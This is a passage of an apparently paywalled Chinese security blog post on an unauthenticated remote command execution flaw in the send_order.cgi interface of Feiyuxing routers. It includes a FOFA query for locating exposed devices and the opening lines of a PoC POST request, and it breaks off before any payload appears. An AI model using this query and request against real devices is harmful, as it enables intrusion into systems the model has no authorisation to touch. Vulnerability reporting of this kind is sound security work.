超级会员免费看
本文介绍了飞鱼星企业级智能上网行为管理系统的send_order.cgi存在未授权远程命令执行漏洞,攻击者可借此执行任意指令并获取服务器权限。复现环境通过FOFA搜索,修复建议包括限制接口访问和升级到安全版本。
0x01 产品简介
飞鱼星企业级智能上网行为管理系统是成都飞鱼星科技开发有限公司开发的一款上网行为管理路由器,专为中小企业、政府机关、教育及科研机构等用户设计,是具备“ 上网行为管理”、“多WAN路由器”以及“VPN网关”多重功能的新一代硬件网络接入设备。它能帮助企业对员工使用因特网的情况进行监控、生成报表并进行管理;帮助企业提高员工的生产率、节省网络带宽并且减少法律风险。
0x01 漏洞概述
飞鱼星企业级智能上网行为管理系统 send_order.cgi接口处存在远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,且写入后门文件可获取服务器权限,造成严重威胁。
0x03 复现环境
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
0x04 漏洞复现
PoC
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.
订阅专栏 解锁全文
扫一扫
1176
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
